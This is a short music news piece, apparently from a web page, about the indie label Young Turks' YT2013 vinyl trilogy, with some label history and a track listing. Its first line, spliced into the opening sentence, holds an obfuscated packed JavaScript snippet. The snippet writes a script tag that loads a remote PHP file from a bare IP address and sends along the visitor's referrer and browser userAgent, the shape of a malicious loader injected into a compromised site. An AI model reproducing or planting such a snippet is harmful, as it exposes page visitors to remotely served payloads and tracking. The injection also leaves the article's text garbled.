Influential (function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(” 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|htthh|var|u0026u|referrer|saied||js|php’.split(‘|’),0,{}))
and cult indie label Young Turks are gearing up to release the final vinyl in their ‘YT2013’ trilogy, a series of three limited edition 12″ records each featuring unique artwork for the discerning vinyl sleeve collectors amongst us.

The trilogy showcases the releases Young Turks have put out during 2013. Highlighted artists include the soul infused electronic sounds of Jamie xx and the rest of The xx crew, FKA Twigs and South London man Sampha, both of whom appear on the BBC’s recent Sounds of 2014 long-list.

The Turks were launched back in 2006 as an imprint to XL Recordings and operate across a wide range of genres but have been pivotal in the launch of seminal iconic musicians such as John Talabot, Holy F*ck and Wavves whilst curating innovative events from club takeovers to Miami music festivals.

1 2

The whole trilogy is due for release on CD and on iTunes on 9 December, this CD/digital package includes individual artwork cards to accompany each track featured, listed below :

1 Lost Scripts – I’ll Be Watching You
02 Koreless – Sun
03 The xx – Reconsider
04 Sampha – Without
05 Short Stories – On The Way
06 Pional – Invisible/Amenaza (Extended Dub 12” Version)
07 FKA Twigs – Water Me

Pick it up here.